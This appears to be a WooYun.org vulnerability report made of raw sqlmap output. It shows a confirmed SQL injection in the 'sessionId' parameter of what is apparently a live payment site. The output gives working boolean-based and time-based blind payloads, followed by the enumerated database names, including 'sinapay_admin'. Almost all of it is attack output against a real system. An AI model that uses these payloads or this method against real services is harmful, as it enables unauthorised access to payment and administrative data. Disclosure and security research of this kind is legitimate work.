WooYun.org

GET parameter 'sessionId' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Place: GET
Parameter: sessionId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sessionId=6756219' AND 8002=8002 AND 'rIeO'='rIeO&paymentTag=alipayAccount
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sessionId=6756219' AND SLEEP(5) AND 'TPxS'='TPxS&paymentTag=alipayAccount
---
[13:28:32] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[13:28:32] [INFO] fetching database names
[13:28:32] [INFO] fetching number of databases
[13:28:32] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:28:32] [INFO] retrieved: 5
[13:28:34] [INFO] retrieved: information_schema
[13:29:38] [INFO] retrieved: sinapay
[13:30:04] [INFO] retrieved: sinapay_admin
[13:30:38] [INFO] retrieved: sinapay_music
[13:31:15] [INFO] retrieved: test
available databases [5]:
[*] information_schema
[*] sinapay
[*] sinapay_admin
[*] sinapay_music
[*] test